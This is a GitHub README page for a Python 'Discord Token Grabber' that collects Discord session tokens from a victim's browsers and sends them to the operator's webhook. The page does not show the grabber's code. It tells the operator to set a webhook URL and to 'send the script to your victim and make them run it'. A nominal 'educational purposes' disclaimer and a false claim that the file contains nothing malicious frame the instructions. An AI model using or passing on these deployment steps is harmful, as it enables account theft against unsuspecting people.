AstraaDev / Discord-Token-Grabber-V2

Simple token grabber developped in python.
https://discord.gg/ckHmZMct5z
119 stars 122 forks source link

[Discord] - Token Grabber V2

astraadev

[Discord] - Token-Grabber collecting the token on any Discord browser written in Python.

## Disclaimer |THIS SCRIPT was made for **Educational purposes**| |-------------------------------------------------| This project was created only for **good purposes** and **personal use**. By using **THIS SCRIPT**, you agree that you **hold responsibility** and accountability of any consequences caused by your actions. # Features ```json { "data_caching": false, #File doesnt contain any virus or malicious thing "webhook_transfer": true, #Sends information through a webhook "cross_platform": true, #Works on all platforms "external_modules_needed": false, #No need external modules to use it "external_modules_required": false } ``` # How to use ```python - Create a WebHook on your Discord Server. I recommend creating a New server! - Change the 'WEBHOOK_URL' variable value in line 124 to your Discord WebHook URL in token_grabber.py. - Send the script to your victim and make them run it! ``` ## Output Example ![tokengrabber_example.png](https://cdn.discordapp.com/attachments/826581697436581919/984383191618043924/tg.png) ## Errors/Fixes No module named 'Crypto' or 'Cryptodome' > open a cmd and type `pip install pycryptodome==3.14.1` > You probably have python 3.10 which has some new shit so downgrade to [python 3.9](https://www.python.org/downloads/release/python-3913/)